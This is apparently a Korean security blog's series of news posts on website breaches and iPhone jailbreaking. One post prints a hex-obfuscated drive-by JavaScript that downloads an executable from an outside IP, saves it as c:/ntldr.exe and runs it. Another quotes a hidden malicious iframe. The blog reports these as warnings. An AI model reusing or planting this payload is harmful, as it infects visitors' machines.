최근 유명한(익히 알려져 있는) 웹사이트들이 SQL Injection 취약점으로 공격받아 충격을 주고 있습니다.

12월 7일에는 c0de.breaker 라는 해커가 미국의 나사(Nasa.org) 웹사이트를 해킹하고 이에 대한 정보를 공개했습니다.


공개한 내용을 살펴 보면, 나사 웹사이트 중 2개의 사이트를 해킹하였습니다. 또한, 데이터베이스의 덤프까지 확인하여 사용자 계정 정보 테이블의 정보까지 공개했습니다.



어떤 방법을 통해 해킹했는지에 대한 언급은 없었지만, 공개한 스크린샷을 통해 SQL Injection 공격일 가능성이 높은 것으로 생각됩니다.

특히, 웹사이트 내에서 사용하는 컨텐츠 관리 시스템의 관리자 권한까지 탈취 당한 것으로 보여져 충격을 주고 있습니다.


감사합니다.
이올린에 북마크하기(0) 이올린에 추천하기(0)
Posted by 문스랩닷컴


    말많던 아이폰이 드디어 KT를 통해 출시가 되었습니다. 아이폰이 가지는 장점은 바로 다양한 애플리케이션(Apps, 앱스)를 유료 또는 무료로 다운받아 즐길 수 있다는 것일 것입니다.

    문제는 유료로 제공되는 앱스를 공짜로 사용할 수 있도록 해킹하는 방법이 인터넷 상에 공개되어 있으며, 실제로 아주 간단한 과정으로 해킹을 할 수 있습니다. 이 과정을 '탈옥(JailBreak)' 라고 부릅니다.


    문제는 탈옥한 아이폰에서는 몇가지 보안 상의 인증 절차가 무력화되어 있다는 것입니다. 이러한 구멍을 통해 개인 정보가 인터넷 상으로 빼돌릴 수 있는 웜이 출현하였으며 이를 애플에서 공지하게 되었습니다.

    웜(Worm)은 자신을 복제하는 조그마한 프로그램으로 네트워크나 기타 방법을 통해 다른 컴퓨터로 무차별적으로 전파되는 악성 프로그램입니다. 즉, 아이폰으로 인터넷을 서핑하다가 웜에 걸릴 수 있다는 의미입니다.

    이번에 출현한 웜은 ING 그룹을 대상으로 하는 것으로 일반화된 공격 형태라고 보기는 어렵습니다. 하지만, 한번 이러한 구멍(!)을 이용하는 악성 프로그램이 출현한 이상 제 2, 제 3의 악성 프로그램이 나오지 않을 가능성은 매우 적다고 보여 집니다.

    아이폰을 쓰시는 분들은 이러한 부분을 잘 고려해서 탈옥할지 여부를 신중히 결정하셔야 할 거 같습니다.

    이올린에 북마크하기(0) 이올린에 추천하기(0)
    Posted by 문스랩닷컴


      SQL Injection 취약점을 이용하여 영국 국회 웹사이트의 데이터베이스를 침해하는 사건가 발생했습니다. 이 사건으로 인해 웹사이트에 관련된 비밀번호가 누출되었습니다.

      "Unu"라는 별명을 가진 해커는 카스퍼스키, 비트디펜더, F-Secure, 시만텍 등의 보안 제품 사이트들, 헤럴드 재단(International Herald Tribute), 텔레그래프 등의 신문사, 특히 최근의 Yahoo! Local 등의 보안 취약점을 밝힌 인물입니다.

      Unu에 따르면 취약점은 http://lifepeeragesact.parliament.uk/ 내의 php 스크립트에 SQL Injection 취약점 즉, 매개변수를 제대로 처리하지 못하는 것으로 알려지고 있습니다. 따라서, 이 취약점을 이용하여 해커는 원하는 SQL 명령문을 실행할 수 있습니다.

      웹 사이트는 Debian 4.0 (Etch) 리눅스 운영체제를 사용하고, MySQL 5.0.32 데이터베이스 엔진을 사용합니다. 아래 그림과 같이 SQL 명령문을 통해 사용하는 데이터베이스가 parliament_live라는 것을 알아 냈습니다.
      <#1. 데이터베이스의 이름을 알아내는 화면>

      더욱 큰 문제는 데이터베이스의 레코드 중 한 항목인 비밀번호 부분이 암호화되지 않고 일반 평문으로 저장되었다는 것입니다. 아래 화면과 같이 SQL 명령문을 실행하여 사용자의 비밀번호를 손쉽게 알아낼 수 있습니다.

      <#2. 관리자 비밀번호를 알아내는 화면>

      한 가지 흥미로운 사실은, 관리자 중에는 Alex Fuller에 속해 있는 "fullera"라는 계정이 있었다는 것입니다. 이 ID는 영국 국회 홈페이지의 개발 관리자 역할을 맡고 있습니다. 그리고, "reida", "moss"라는 2 ID는 Mr. Alan Reid(민주당 하원), Mr. Malcolm Moss(보수당 하원)라는 주장이 있습니다만 공식적으로 확인되지는 않았습니다.

      아직 이 취약점을 해결되지 않은 상태이며 분석 결과 아래와 같이 취약점이 존재합니다. 물론, 이 링크 이외에도 다수 취약점이 존재합니다.
      (알림: 취약점 남용을 막기 위해 URL의 뒷부분을 안보이게 처리합니다)
      <#3. 아직 해결되지 않은 것을 분석한 화면>
      이올린에 북마크하기(0) 이올린에 추천하기(0)
      Posted by 문스랩닷컴


        널리 알려지고 안전하다고 생각되는 사이트만을 방문한다고 한다면 '안티 바이러스' 즉 백신이 필요없을까요?

        또한, 최신 서비스팩이나 업데이트를 하지 않더라도 컴퓨터에 아무런 문제가 발생하지 않을까요?

        아래의 소식은 유명하고, 안전할거라고 여겨지는 사이트에서 해킹을 당하여 방문자들이 악성코드 피해를 입을 수 있는 가능성을 보여 주고 있습니다. 항상 안티 바이러스를 생활화해야 할 것입니다.


        최근 웹 공격이 많아지면서 대형 포탈 뿐만 아니라 유명한 웹 사이트들이 종종 해킹당하는 사태가 벌어지고 있습니다. 지난 주에 발생한 어도비(Adobe) 웹사이트의 해킹 소식을 전합니다.

        보안 기업으로 유명한 소포스(Sophos) 사는 어도비 웹사이트에 방문한 사람들이 악성 코드에 감염될 수 있었다고 밝혔다.

        소포스는 이러한 문제를 확인하고 지속적으로 어도비에 연락을 취하였으며 지난 주 목요일까지 악성 코드가 웹사이트에 그대로 방치되었다고 한다.

        웹 사이트에서 비디오 블러거를 위한 팁을 제공하는 'Vlog IT support centre section' 부분에 'Mal/Badsrc-C'라는 악성 코드가 존재했다고 합니다. Mac/Badsrc-C 악성 코드는 SQL 인젝션 공격을 이용하여 여러 컴퓨터에 널리 감염시키는 위험한 코드이며, 인터넷에서 악성 스크립트를 다운로드하여 실행되면 사용자 PC에 스파이웨어가 설치됩니다.

        하지만, 아직까지 어도비 사에서는 명확한 답변을 하지 않고 있습니다.

        이올린에 북마크하기(0) 이올린에 추천하기(0)
        Posted by 문스랩닷컴


          블러그를 하던 중에 Design Liv2님의 글을 보니, 오픈블로그(www.openblog.co.kr) 사이트가 해킹된 거 같다는 글을 보았습니다.

          즉시, 접속하여 확인해 보니, 탑 페이지에 iframe 명령어를 사용한 악성 코드가 삽입되어 있습니다.
          사용자 삽입 이미지

          해당 사이트에 접속하여 다시 소스를 보니, 익스플로잇이 실행되도록 조작되어 있습니다.
          <script language=javascript>
          try {
          eval("\x76\x61\x72\x20\x64\x66\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x6F\x62\x6A\x65\x63\x74\x27\x29\x3B");
          eval("\x64\x66\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x27\x63\x6C\x61\x73\x73\x69\x64\x27\x2C\x27\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x27\x29\x3B");
          eval("\x76\x61\x72\x20\x78\x50\x6F\x73\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x27\x2C\x27\x27\x29\x3B");
          eval("\x78\x50\x6F\x73\x74\x2E\x4F\x70\x65\x6E\x28\x27\x47\x45\x54\x27\x2C\x27\x68\x74\x74\x70\x3A\x2F\x2F\x36\x34\x2E\x33\x37\x2E\x37\x31\x2E\x39\x38\x2F\x76\x62\x73\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
          eval("\x78\x50\x6F\x73\x74\x2E\x53\x65\x6E\x64\x28\x29\x3B\x76\x61\x72\x20\x73\x47\x65\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x27\x2C\x27\x27\x29\x3B");
          eval("\x73\x47\x65\x74\x2E\x4D\x6F\x64\x65\x3D\x33\x3B\x73\x47\x65\x74\x2E\x54\x79\x70\x65\x3D\x31\x3B\x73\x47\x65\x74\x2E\x4F\x70\x65\x6E\x28\x29\x3B");
          eval("\x73\x47\x65\x74\x2E\x57\x72\x69\x74\x65\x28\x78\x50\x6F\x73\x74\x2E\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B");
          eval("\x73\x47\x65\x74\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x32\x29\x3B");
          eval("\x76\x61\x72\x20\x78\x20\x3D\x20\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x77\x73\x63\x72\x69\x70\x74\x2E\x73\x68\x65\x6C\x6C\x27\x2C\x27\x27\x29\x3B");
          eval("\x78\x2E\x72\x75\x6E\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
          eval("");
          }
          catch (error)
          { }
          </script>
          <script type="text/jscript">
          function init() {
          document.write("Not Found");
          }
          window.onload = init;
          </script>

          최근 유행하는 공격 패턴은 ARP 스푸핑을 이용하여 조작하여 공격하는 것으로 이 중 공격 패턴은 앞서 언급한 것과 같이 탑 페이지에 익스플로잇을 통해 다른 경유서버에서 다운로드하여 실행하게 하는 방식입니다.

          오픈블로그에서 빨리 조치를 취하시길... ...

          이올린에 북마크하기(0) 이올린에 추천하기(0)
          Posted by 문스랩닷컴


            각 나라별로는 정보 보안을 담당하는 기관들이 있으며, 이러한 기관 내에는 침해사고 대응팀, 보안 대응팀 등이 운영되고 있다.

            우리나라에서는 다음과 같은 기관이 있다.

            이 번에 수모를 당한 기관은 중국에서 운영하고 있는 CISRT(Chinese Internet Security Response Team)으로 영문 웹사이트가 해킹을 당한 것으로 알려졌다.

            CISRT 영문 웹사이트에는 다음과 같이 사과문이 게재되어 있다.

            ARP attack to CISRT.org

            We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.  

            The malicious codes are inserted into the top of some pages.
            <iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>


            This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.

            This trojan-downloader can download 20 trojans from ganbibi.com.

            We suggest everyone could block this two domains "nmmmn.com","ganbibi.com"

            사연은 이렇다. CISRT 웹사이트 중 영문 웹사이트의 일부 탑페이지에서 iframe 악성코드가 삽입되는 공격을 당했다. 이 웹사이트를 방문한 사람은 37Kb 크기의 "sms.exe"라는 실행 파일을 다운로드하게 한다. 이 파일은 카스퍼스키 안티바이러스에서는 "Troyan-Downloader.Win32.Baser.w"로 진단한다.

            중국에서 개발한 웹 브라우저 기반의 미디어 플레이어인 BaoFeng Storm의 버퍼오버플로 취약점으로 통해 공격이 이루어졌다. BaoFeng Storm은 ActiveX 컨트롤을 이용하여 제공되며, 이전에 이미 시만텍은 사용자가 입력한 값을 확인하는 부분이 제대로 동작하지 않아 여러 개의 버퍼오버플로 취약점이 존재한다고 밝혔다.

            CISRT는 웹 사이트가 해킹된 것이 아니라 "ARP" 공격의 이루어진 것으로 믿고 있다. "ARP" 공격은 최신 공격 기법 중의 하나로 ARP poisoning 또는 ARP spoofing 공격이라고도 한다.

            보안 벤더인 F-Secure의 패트릭 러날드(Patrik Runald)는 CISRT 웹사이트가 해킹 당한 것으로 보이며, ARP 공격이라고 한다면 꽤 복잡한 방법을 사용했을 것이라고 밝혔다.

            출처: http://www.zdnetasia.com/news/security/0,39044215,62032982,00.htm

            특히 국가에서 운영하는 보안 기관의 웹사이트는 일반인들이 아무런 의심없이 접속하는 사이트로 보안 상태가 가장 철저하게 유지되어야 하는데, 이러한 사고가 났다니 참 어이없는 일이 아닐 수 없다.

            우리나라 특히, 교육기관같은 정부기관은 외국의 해킹 앞마당 노릇을 하고 있는 형편이다. 이러한 점들을 보완해야 IT 강국으로서의 면모가 서지 않을까?

            Daum 블로거뉴스
            블로거뉴스에서 이 포스트를 추천해주세요.

            이올린에 북마크하기(0) 이올린에 추천하기(0)
            Posted by 문스랩닷컴


              아이폰이 나온 이래로 아이폰의 해킹 방법에 대해 다양한 뉴스거리가 나왔습니다. 하지만, 아이폰은 유닉스 계열의 운영체제가 내부에 있으며 이러한 관계로 실제 해킹을 하는 방법이 그리 쉽게 설명되지는 않았습니다.

              하지만, Gizmodo 사이트에서는 아이폰에서 서드파티 애플리케이션을 설치하는 방법을 단계별로 세분화하여 자세하게 설명한 자료가 공개되었습니다.
              사용자 삽입 이미지



              사이트 링크: http://gizmodo.com/gadgets/piece-of-cake/how-to-install-apps-on-your-iphone-easily-no-hacking-skills-required-291184.php


              이올린에 북마크하기(0) 이올린에 추천하기(0)
              Posted by 문스랩닷컴


                아이폰이 나온 이후로 해킹을 통해 다양한 모드(MOD)가 공개되었습니다. 애플에서는 이러한 문제점(!)을 해결하기 위해 소프트웨어 패치를 발표했으며, 이 패치를 설치하게 되면 원본 이미지가 변경된 경우 다시 다운로드하여 원상태로 되돌리도록 하였습니다.

                하지만, 크로아티아의 한 해커가 새로운 소프트웨어 버전의 아이폰을 완벽하게 해킹하여 해킹 방법까지도 공개했습니다.
                사용자 삽입 이미지

                원래 아이폰은 AT&T 통신회사와 계약을 통해 인터넷은 이 회사를 통해서만 사용할 수 있도록 고정이 되어 있었는데 이 부분을 해킹하여 어느 통신사든지 연결하여 사용할 수 있게 하였습니다. 즉, GSM이나 WIFI도 사용할 수 있다는 것입니다.

                또한, SIM 카드(GSM 방식에서 사용되는 개인 식별용 카드), SIM 리더/라이터, 실버 카드 등을 사용할 수 있습니다.

                해킹 방법 링크: http://www.hackint0sh.org/forum/showthread.php?t=2215
                해킹 공개 링크: http://www.jabucnjak.hr/
                이올린에 북마크하기(0) 이올린에 추천하기(0)
                Posted by 문스랩닷컴


                  아이폰이 출시된 이후로 해커들은 다양한 모드(Modification, 변형)를 찾아내어 이를 인터넷에 공개해 왔습니다.

                  관련 자료: 아이폰 해킹 프로그램 IFuntastic - GUI 인터페이스 제공

                  애플은 기존에 발표되었던 사파리 관련 보안 취약점을 해결하는 v1.0.1의 보안 업데이트를 발표하였습니다. 사파리의 자바 스크립트 처리 부분, PCRE(Perl Compatible Regular Expressions) 라이브러리의 버퍼 오버플로, HTTP 인젝션 오류 등이 포함됩니다. 그리고, 관계자는 사용자가 펌웨어를 변경하였더라도 이를 삭제하거나 하는 등 변경시키지는 않는다고 밝혔습니다.

                  하지만, 한 해커에 따르면 업데이트를 하는 도중에 펌웨어의 변형 여부를 검사한다고 합니다. 만약 기존의 펌웨어가 변형된 것으로 확인되면, 삭제하고 최신 펌웨어로 자동 설치됩니다.

                  이러한 애플의 공격(!)을 막기 위해 iPhone IRC(Internet Relay Chat)에서는 이러한 잠금 기능을 해제하기 위해 작업에 돌입했다고 합니다.

                  이러한 애플의 업데이트로 인해 지금까지 사용자들에 인기 있었던 MOD 기술, 툴과 같은 방법들이 통하지 않고 있지만 얼마 안가 새로운 기법이 나타날 것으로 예상됩니다.

                  참고로 JailBreak 1.0은 최신 펌 웨어에서도 동작한다고 합니다.

                  출처: http://mybroadband.co.za/news/Hardware/880.html

                  PS: 뚫고, 막고, 또 뚫는 기술의 경합 그 끝의 승자는 누구일까요?
                  이올린에 북마크하기(0) 이올린에 추천하기(0)
                  Posted by 문스랩닷컴


                    2사분기에 아이폰이 나온 이후로 다양한 해킹꺼리가 인터넷을 달구고 있는 가운데, 드디어 지금까지 알려진 해킹 기술을 사용자들이 손쉽게 사용할 수 있도록 그래픽 인터페이스(GUI)로 동작하는 IFuntastic이라는 프로그램이 개발되고 있다.

                    현재 동작하는 기능으로는 애플리케이션을 T-Mobile이라고 부르는 공간에서 실행할 수 있게 할 지, 파일 시스템에서 동작하게 할지 설정을 할 수 있다. 또한, 벨소리를 변경하거나, 홈 스크린(화면 하단의 아이콘들)에 있는 아이콘의 배치 변경, AT&T 로고 변경 등이 가능하다.

                    사용자 삽입 이미지

                    프로그램 다운로드: http://www.modmyiphone.com/forums/showthread.php?t=1444

                    이올린에 북마크하기(0) 이올린에 추천하기(0)
                    Posted by 문스랩닷컴